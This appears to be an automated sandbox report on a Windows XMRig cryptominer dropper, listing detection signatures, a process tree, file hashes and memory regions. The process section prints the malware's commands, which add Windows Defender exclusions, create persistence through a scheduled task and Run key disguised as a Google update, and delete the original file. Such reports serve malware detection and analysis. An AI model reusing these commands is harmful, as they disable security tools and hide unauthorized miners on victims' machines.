Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1798s
  • max time network
    1791s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3460
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\XJEzW6M7WvHaF3EX.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\XJEzW6M7WvHaF3EX.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1040
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3240
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3948
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\XJEzW6M7WvHaF3EX.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4520
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4612
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:4636
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:1384
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:4592
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          • Suspicious use of WriteProcessMemory
          PID:1940
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          PID:3936
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe qtdiqnkejoz
          2⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          PID:3544
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
          2⤵
            PID:1504
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          1⤵
            PID:676
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4996
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PATH Win32_VideoController GET Name, VideoProcessor
            1⤵
            • Detects videocard installed
            PID:4412

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Discovery

          System Information Discovery

          1
          T1082

          Query Registry

          1
          T1012

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            16KB

            MD5

            75370d36932c54348c774ecfdd1cc326

            SHA1

            e40b507e926126cb6d11f07915159ba578f5729f

            SHA256

            1231247ec1f54d1f055720437bcfc4dbf405a23109ab948612c000d8afe57794

            SHA512

            12b4d78b3d753686030fc49ce2f7f96d5aa03256ece50b6aec8a2a58812baa397fb68e73333905e94ed0e83089de56ed8cf276b257795879747d83edfb5b57a1

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            489KB

            MD5

            287ce24c78587f09a4239d0c8678f610

            SHA1

            bdd49a9fc37484ce851fe9d38715c6202935ac1b

            SHA256

            ab6e83e455a2b61009a5c391d93b98688a875a92ab67db6053418fac38f758f8

            SHA512

            fabfe32427a1d1d4aff49cb12fc3b7de41218bc8c387ff860273204fca52b897a435a9a0596a613269dde0f3d172d4ec6c2877ddcd0740493e9302b2fb324907

          • C:\Program Files\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            77d622bb1a5b250869a3238b9bc1402b

            SHA1

            d47f4003c2554b9dfc4c16f22460b331886b191b

            SHA256

            f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

            SHA512

            d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            635e5996db28991f9b5105b5bee8fdca

            SHA1

            65683134b81b1f994f1ceb16e00c979751569e2b

            SHA256

            d17623f3ba80ca3603ea0a05129473793a097ef3f4f2311fa355eb7febfd58ff

            SHA512

            09f4062f6dcbd76922a5424055208e8f97f596bd56e4f607a003a5f05f936e6b968909e56b826d0d27a7aad534ccd57746029412d98e03867ecde532de3a3db0

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5vllclih.5yx.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/1040-0-0x00007FF6D8F80000-0x00007FF6D9191000-memory.dmp
            Filesize

            2.1MB

          • memory/1040-36-0x00007FF6D8F80000-0x00007FF6D9191000-memory.dmp
            Filesize

            2.1MB

          • memory/1384-82-0x00000265D1930000-0x00000265D1936000-memory.dmp
            Filesize

            24KB

          • memory/1384-74-0x00000265D16D0000-0x00000265D16EC000-memory.dmp
            Filesize

            112KB

          • memory/1384-83-0x00000265D1940000-0x00000265D194A000-memory.dmp
            Filesize

            40KB

          • memory/1384-80-0x00000265D1950000-0x00000265D196A000-memory.dmp
            Filesize

            104KB

          • memory/1384-81-0x00000265D1900000-0x00000265D1908000-memory.dmp
            Filesize

            32KB

          • memory/1384-79-0x00000265D18F0000-0x00000265D18FA000-memory.dmp
            Filesize

            40KB

          • memory/1384-84-0x00000265D0AA0000-0x00000265D0AB0000-memory.dmp
            Filesize

            64KB

          • memory/1384-77-0x00000265D1480000-0x00000265D148A000-memory.dmp
            Filesize

            40KB

          • memory/1384-78-0x00000265D1910000-0x00000265D192C000-memory.dmp
            Filesize

            112KB

          • memory/1384-87-0x00007FFCD5190000-0x00007FFCD5C51000-memory.dmp
            Filesize

            10.8MB

          • memory/1384-75-0x00000265D0AA0000-0x00000265D0AB0000-memory.dmp
            Filesize

            64KB

          • memory/1384-64-0x00000265D0AA0000-0x00000265D0AB0000-memory.dmp
            Filesize

            64KB

          • memory/1384-63-0x00000265D0AA0000-0x00000265D0AB0000-memory.dmp
            Filesize

            64KB

          • memory/1384-62-0x00007FFCD5190000-0x00007FFCD5C51000-memory.dmp
            Filesize

            10.8MB

          • memory/1384-76-0x00000265D16F0000-0x00000265D17A5000-memory.dmp
            Filesize

            724KB

          • memory/1504-146-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-158-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-188-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-186-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-184-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-182-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-180-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-178-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-176-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-174-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-172-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-170-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-168-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-166-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-164-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-162-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-160-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-156-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-154-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-152-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-150-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-148-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-144-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-120-0x00000230006C0000-0x00000230006E0000-memory.dmp
            Filesize

            128KB

          • memory/1504-119-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-125-0x0000023000730000-0x0000023000750000-memory.dmp
            Filesize

            128KB

          • memory/1504-142-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-127-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-128-0x0000023011200000-0x0000023011220000-memory.dmp
            Filesize

            128KB

          • memory/1504-129-0x0000023011220000-0x0000023011240000-memory.dmp
            Filesize

            128KB

          • memory/1504-131-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-140-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-133-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-134-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-136-0x00007FF7C2BA0000-0x00007FF7C3394000-memory.dmp
            Filesize

            8.0MB

          • memory/1504-137-0x0000023011200000-0x0000023011220000-memory.dmp
            Filesize

            128KB

          • memory/1504-138-0x0000023011220000-0x0000023011240000-memory.dmp
            Filesize

            128KB

          • memory/3240-11-0x00007FFCD5190000-0x00007FFCD5C51000-memory.dmp
            Filesize

            10.8MB

          • memory/3240-16-0x00007FFCD5190000-0x00007FFCD5C51000-memory.dmp
            Filesize

            10.8MB

          • memory/3240-13-0x00000131D88F0000-0x00000131D8900000-memory.dmp
            Filesize

            64KB

          • memory/3240-1-0x00000131C02E0000-0x00000131C0302000-memory.dmp
            Filesize

            136KB

          • memory/3240-12-0x00000131D88F0000-0x00000131D8900000-memory.dmp
            Filesize

            64KB

          • memory/3544-132-0x00007FF75D4B0000-0x00007FF75D4C6000-memory.dmp
            Filesize

            88KB

          • memory/3544-126-0x00007FF75D4B0000-0x00007FF75D4C6000-memory.dmp
            Filesize

            88KB

          • memory/3948-34-0x00007FFCD5190000-0x00007FFCD5C51000-memory.dmp
            Filesize

            10.8MB

          • memory/3948-32-0x000001EFA3730000-0x000001EFA3740000-memory.dmp
            Filesize

            64KB

          • memory/3948-31-0x000001EFA3730000-0x000001EFA3740000-memory.dmp
            Filesize

            64KB

          • memory/3948-28-0x00007FFCD5190000-0x00007FFCD5C51000-memory.dmp
            Filesize

            10.8MB

          • memory/3948-29-0x000001EFA3730000-0x000001EFA3740000-memory.dmp
            Filesize

            64KB

          • memory/3948-30-0x000001EFA3730000-0x000001EFA3740000-memory.dmp
            Filesize

            64KB

          • memory/4592-115-0x00007FFCD5190000-0x00007FFCD5C51000-memory.dmp
            Filesize

            10.8MB

          • memory/4592-101-0x000002B413B70000-0x000002B413B80000-memory.dmp
            Filesize

            64KB

          • memory/4592-100-0x000002B413B70000-0x000002B413B80000-memory.dmp
            Filesize

            64KB

          • memory/4592-99-0x00007FFCD5190000-0x00007FFCD5C51000-memory.dmp
            Filesize

            10.8MB

          • memory/4592-111-0x00007FF4DFC30000-0x00007FF4DFC40000-memory.dmp
            Filesize

            64KB

          • memory/4592-112-0x000002B413B70000-0x000002B413B80000-memory.dmp
            Filesize

            64KB

          • memory/4592-113-0x000002B413B70000-0x000002B413B80000-memory.dmp
            Filesize

            64KB

          • memory/4612-48-0x000001FC81570000-0x000001FC81580000-memory.dmp
            Filesize

            64KB

          • memory/4612-46-0x00007FFCD5190000-0x00007FFCD5C51000-memory.dmp
            Filesize

            10.8MB

          • memory/4612-51-0x00007FFCD5190000-0x00007FFCD5C51000-memory.dmp
            Filesize

            10.8MB

          • memory/4996-52-0x00007FF6CFFE0000-0x00007FF6D01F1000-memory.dmp
            Filesize

            2.1MB

          • memory/4996-121-0x00007FF6CFFE0000-0x00007FF6D01F1000-memory.dmp
            Filesize

            2.1MB